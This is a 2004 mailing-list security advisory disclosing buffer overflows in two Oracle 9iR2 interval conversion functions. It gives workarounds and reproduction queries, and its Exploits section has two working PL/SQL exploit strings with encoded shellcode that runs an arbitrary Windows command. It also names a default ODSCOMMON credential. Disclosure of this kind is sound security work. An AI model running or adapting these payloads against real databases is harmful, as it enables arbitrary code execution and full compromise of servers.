[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040205201201.64288.qmail@web40012.mail.yahoo.com>
From: cesarc56 at yahoo.com (Cesar)
Subject: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow
Security Advisory
Name: Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow.
System Affected : Oracle Database 9ir2, previous
versions could be affected too.
Severity : High
Remote exploitable : Yes
Author: Cesar Cerrudo.
Date: 02/05/04
Advisory Number: CC020401
Legal Notice:
This Advisory is Copyright (c) 2003 Cesar Cerrudo.
You may distribute it unmodified and for free. You may
NOT modify it and distribute it or distribute
parts of it without the author's written permission.
You may NOT use it for commercial intentions
(this means include it in vulnerabilities databases,
vulnerabilities scanners, any paid service,
etc.) without the author's written permission. You are
free to use Oracle details for commercial intentions.
Disclaimer:
The information in this advisory is believed to be
true though it may be false.
The opinions expressed in this advisory are my own and
not of any company. The usual standard
disclaimer applies, especially the fact that Cesar
Cerrudo is not liable for any damages caused
by direct or indirect use of the information or
functionality provided by this advisory.
Cesar Cerrudo bears no responsibility for content or
misuse of this advisory or any derivatives thereof.
!!!!!!!!!!!ALERT!!!!!!!!!!!:
Oracle was contacted about these vulnerabilities, but
their Security Response Team is one of the worst that
i have deal with, they don't care about security and
they don't even follow OISafety rules(Oracle is a
member).
Because this reason we only have told to Oracle about
just a couple of bugs, i think i won't contact them
anymore,
or maybe if i get a letter from Larry Ellison asking
for apologies...:).
Anyways if Oracle would spend more money on security
than in marketing saying that their products are
unbreakable
everything would be different. Right now Oracle
database server and other Oracle products are some
kind of backdoor.
These vulnerabilities are just only a bit of +60 that
we have identified (yes more than 60 issues and
most of these issues can be exploited by any low
privileged user to take complete control over the
database and probably OS, also for some of them there
aren't any workarounds). If you are running Oracle i
recomend you to start praying to not being hacked and
to start complaining to Oracle to improve the quality
of
their products and to release patches.
BTW: if someone from Oracle dares to say that i'm not
telling the true, then probably i will release all the
holes
information to shut their mouths.
Some workaround to protect your Oracle servers until
maybe next year when Oracle probably could fix their
buggy
database server:
-Check packages permissions and remove public
permission, set minimal permissions
that fit your needs.
-Check Directory Objects permissions and remove public
permission, set minimal permissions
that fit your need, remove Directory Objecs if not
used.
-Restrict users to execute directly PL/SQL statements
over the server.
-Periodically audit users permissions on all database
objects.
-Lock users that aren't used.
-Change default passwords.
If you want automation, i really like AppDetective for
Oracle:
http://www.appsecinc.com/products/appdetective/oracle/
Overview:
Oracle Database Server is one of the most used
database servers in the world, it was marketed
as being unbreakable and many people thinks that is
one of the most secure database server in
the market. Larry Ellison (Oracle CEO) says that
Oracle is used by NSA, CIA, russian intelligence,
goverments, etc.
(www.commonwealthclub.org/archive/96/96-03ellison-qa.html),
so it must be really secure!!!
Oracle Database Server provides two functions that can
be used with PL/SQL to convert numbers
to date/time intervals, these functions have buffer
overflow vulnerebilities.
Details:
When any of these conversion funcions are called with
a long string as a second
parameter a buffer overflow occurs.
To reproduce the overflow execute the next PL/SQL:
SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
This vulnerability can be exploited by any Oracle
Database user because access to these
functions can't be restricted.
Explotation of this vulnerability allow an attacker to
execute arbitrary code, also it
can be exploited to cause DOS (Denial of service)
killing Oracle server process. An attacker can
complete compromise the OS and database if Oracle is
running on Windows plataform, because Oracle must
run under the local System account or under an
administrative account. If Oracle is running on *nix
then only the database could be compromised because
Oracle runs mostly under oracle user which has
restricted
permissions.
Important!: Explotation of these vulnerabilities
becomes easy if Oracle Internet Directory has
been deployed, because Oracle Internet Directory
creates a database user called ODSCOMMON that
has a default password ODSCOMMON (Unbreakable???,
hahaha, please take a look at this
http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html),
this password can not be changed,
so any attacker can use this user to connect to
database and exploit these vunerabilities.
Full tests on Oracle database 9ir2 under Microsoft
Windows 2000 Server and Linux confirm these
vulnerabilities,
versions running in other OS plataforms are believed
to be affected too.
Previous Oracle Database Server versions could be
affected by these vulnerabilities.
Exploits:
--these exploits should work on W2K Server and WinXp,
not tested on Win2003.
--run any command at the end of the string
SELECT
NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
||
chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
ARE YOU SURE? >c:\Unbreakable.txt')
FROM DUAL;
SELECT
NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
||
chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
ARE YOU SURE? >c:\Unbreakable.txt')
FROM DUAL;
Vendor Fix:
Go to Oracle Metalink site, http://metalink.oracle.com
Vendor Contact:
Oracle was contacted and they released a fix without
telling me nor the public anything and without issuing
an alert.
__________________________________
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html
Powered by blists - more mailing lists